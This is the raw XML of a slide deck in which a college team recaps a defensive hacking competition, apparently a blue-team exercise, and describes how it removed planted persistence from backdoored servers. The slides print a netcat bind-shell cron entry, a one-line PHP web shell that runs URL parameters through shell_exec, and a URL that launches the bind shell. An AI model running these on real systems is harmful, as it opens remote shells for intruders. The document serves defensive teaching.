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Lutz" userId="S::jwxx@iup.edu::04883108-bba5-4abf-aa72-14999c8b422f" providerId="AD" clId="Web-{10FC0B46-907B-4CAA-B7B5-24480C1FD272}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="James Lutz" userId="S::jwxx@iup.edu::04883108-bba5-4abf-aa72-14999c8b422f" providerId="AD" clId="Web-{10FC0B46-907B-4CAA-B7B5-24480C1FD272}" dt="2018-10-23T18:29:15.689" v="19" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="James Lutz" userId="S::jwxx@iup.edu::04883108-bba5-4abf-aa72-14999c8b422f" providerId="AD" clId="Web-{10FC0B46-907B-4CAA-B7B5-24480C1FD272}" dt="2018-10-23T18:29:15.689" v="18" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="846291687" sldId="263"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="James Lutz" userId="S::jwxx@iup.edu::04883108-bba5-4abf-aa72-14999c8b422f" providerId="AD" clId="Web-{10FC0B46-907B-4CAA-B7B5-24480C1FD272}" dt="2018-10-23T18:29:15.689" v="18" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="846291687" sldId="263"/>
            <ac:spMk id="3" creationId="{58DAEE64-8F4C-4866-8E9D-708A42CC9D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3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3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0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26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76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49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00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1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1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5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8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0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7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8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9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9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99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A8E5-A6BD-4595-BBE5-906F413C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Hindsight 20/20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F779E-B56B-49BD-83C8-A2791A3BAF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What we learned while defending booby-trapped</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>boxes from skilled attackers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="53562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738C-3E3E-4189-8481-D9ADFE89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 Password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47B3B-10B7-4762-9C13-F58E206CC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Re-create user, fix home directory permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We don’t know the user’s password though…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Plaintext FTP, no encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Just wait for the scoring engine to connect, grab the password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wireshark? Nope, just </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcpdump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcpdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> port ftp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6C86E-6651-432D-8EB3-22E74F2F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64" y="5354409"/>
            <a:ext cx="11186095" cy="87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D2FB-85A5-4F3F-9481-2F231A8B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5ECEE-2049-4688-B440-F9F8232DB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SSH Keys again:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add keys to root user’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>authorized_keys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Add other key files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AuthorizedKeys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> option in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ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sshd_config</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AuthorizedKeysFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>authorized_keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /.a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5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D2FB-85A5-4F3F-9481-2F231A8B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5ECEE-2049-4688-B440-F9F8232DB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Immutable files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cap="none" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chattr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> all the things”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-Brody (Red team)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chattr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>authorized_keys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none" dirty="0">
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" cap="none" dirty="0">
              <a:latin typeface="Arial monospaced for SAP" panose="020B060902020203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2D896-8E26-4740-9B49-F25EBB5E2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427" y="2510287"/>
            <a:ext cx="6826744" cy="9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FA034-BE55-4B28-8375-2903944F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03D30-2C5C-4EC2-B5A8-D336C797E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ChRON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>TABle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – crontab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basically a task scheduler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>crontab -e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>minute hour day month day-of-week &lt;command&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>30 2 * * 6 tar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xvf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" cap="none" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>* * * * * nc -l -p 4444 -e /bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“5 * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> job, would run again”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34415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4E24-1283-419E-8A86-B4EEF4B2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FB20C6-F89F-40A6-A700-987E1B95D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2" t="12730" r="2378" b="18978"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="2122235"/>
            <a:ext cx="9905997" cy="44423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D52699-BCAF-415F-8700-662214696D2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="6017567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3:15 PM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1901596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4E24-1283-419E-8A86-B4EEF4B2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FB20C6-F89F-40A6-A700-987E1B95D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" t="14300" r="2405" b="17355"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="2120566"/>
            <a:ext cx="9905998" cy="444566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19F62-4E08-4628-BBC9-4945ACA27868}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="6017567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4:00 PM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="70484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0B792-40E5-4321-936F-865AE163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CNY Hackathon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F185-DF4D-46ED-95B7-5BE4AE025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Hackathon run by Mohawk Valley Community College and Utica College</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Usually run on-location, this event is done remotely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8 teams from New Jersey, New York, Pennsylvania, and Vermont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4A9A38-2AB9-40CD-92CB-6DEFA2B6B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07" y="771142"/>
            <a:ext cx="1828804" cy="15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8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40AD7-A2EB-44E6-9DB8-FAAEFA88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7758-9A3C-426F-98C6-7DD89A039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 Team (Defensive) Challenges (~2/3 point total)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Given back-doored and vulnerable boxes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Need to get them online, and defend them from the Red Team</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Router, SSH, FTP, Website, Database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CTF Challenges (~1/3 point total)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trivia, reverse engineering, steganography, exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="132480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522A-1377-4D0A-9329-863D2EBE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Evening: Router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BA68F-A420-4EE4-BF77-2862B0721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4954587" cy="3124201"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Meeting for all teams, introduction to challenge</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Get our software router online</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NAT Masquerading and port forwarding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For the web server:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>172.18.13.8:80 -&gt; 192.168.8.5:80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88B46-0751-4E28-848B-7B4FAC74A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7" t="36702" r="2560" b="7965"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6316982" y="2514600"/>
            <a:ext cx="5510605" cy="37338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D3F059-E2A9-4F18-A4E4-DA0F9B41F6B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7222921" y="2792485"/>
            <a:ext cx="2298584" cy="11838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D96D41-ED02-403B-8C8E-B82738D8D4A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6769100" y="4276725"/>
            <a:ext cx="1301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B6E8EE-68A4-447F-B7C3-B3BE83474958}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8070850" y="3676650"/>
            <a:ext cx="0" cy="600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7017FA-D90D-471B-8604-DC788EEFA388}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6769100" y="4276725"/>
            <a:ext cx="0" cy="5048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5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31C6-3F88-45CE-A747-8FC8417A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Saturday: The actual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86690-1EFB-463E-BB7B-3F33C6C68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We’re a DFIR (Digital Forensics and Incident Response) team brought in after a discovered breach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hosts have been taken offline to prevent further damage, are infected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remove persistence methods and get services up and running  ASAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scored based on how long the services are up</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24243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120F-08EE-46E7-873E-DFB5961C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boxes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E337-16B0-40E3-862E-635B55F90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SSH Keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>authorized_keys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other key paths added to SSH server config</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other user accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Look in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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Look for other accounts that</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>don’t have /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin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F4D8D-9820-4F06-BE72-0994CE413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326" y="2514600"/>
            <a:ext cx="4705350" cy="169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60BEA-7944-4040-916B-B5BC1CB23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876" y="5091112"/>
            <a:ext cx="56388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8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E8F1-58DC-4234-A374-E74A1573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EE64-8F4C-4866-8E9D-708A42CC9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666999"/>
            <a:ext cx="10133391" cy="3124201"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Simple Apache, PHP, MySQL web stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHP Web shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shell_exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($_GET[“command”]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –l –p 4444 –e /bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://192.168.8.5/index.php?command=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" cap="none" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc+-l+-p+4444+-e+/bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 192.168.8.5 4444</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>www@www</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]$</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" cap="none" dirty="0">
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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F84B7-9F13-4F04-BBF3-A764FEB0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4BF22-257A-4F8C-BC71-5A06C90E7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SQL database for website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Needs to be up to get full points for website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Backdoor SQL users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user,host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mysql.user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@’%’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>means connect from any address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none" dirty="0">
              <a:latin typeface="Arial monospaced for SAP" panose="020B06090202020302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20617-B2B5-49D3-9811-B9D01AF7E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000" y="2514600"/>
            <a:ext cx="4254971" cy="26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3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9E92-D1BC-4C4B-B288-EEE2209F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&amp; FTP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282A7-331D-4612-B001-1F7560D4F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dirty="0"/>
              <a:t>SSH: User just needs to log in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pre-installed SSH key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remove all unneeded permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>FTP: Not already set up for us</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install an FTP server (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vsFTPd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Authenticates via password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Just fetches a file from the user’s home directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Thing is….. James deleted the user. Oops!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="634957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225</TotalTime>
  <Words>523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Mesh</vt:lpstr>
      <vt:lpstr>Hindsight 20/20</vt:lpstr>
      <vt:lpstr>CNY Hackathon</vt:lpstr>
      <vt:lpstr>Challenges</vt:lpstr>
      <vt:lpstr>Friday Evening: Router configuration</vt:lpstr>
      <vt:lpstr>Saturday: The actual challenge</vt:lpstr>
      <vt:lpstr>All boxes</vt:lpstr>
      <vt:lpstr>Web server</vt:lpstr>
      <vt:lpstr>MySQL Server</vt:lpstr>
      <vt:lpstr>SSH &amp; FTP server</vt:lpstr>
      <vt:lpstr>FTP Password recovery</vt:lpstr>
      <vt:lpstr>Removing persistence</vt:lpstr>
      <vt:lpstr>Removing persistence</vt:lpstr>
      <vt:lpstr>Removing persistence</vt:lpstr>
      <vt:lpstr>Wrapping up</vt:lpstr>
      <vt:lpstr>Wrapping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Hindsight 20/20</dc:title>
  <dc:creator>James Andrew Lutz</dc:creator>
  <cp:lastModifiedBy>James Andrew Lutz</cp:lastModifiedBy>
  <cp:revision>52</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-18T13:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-23T18:29:17Z</dcterms:modified>
</cp:coreProperties>
</file>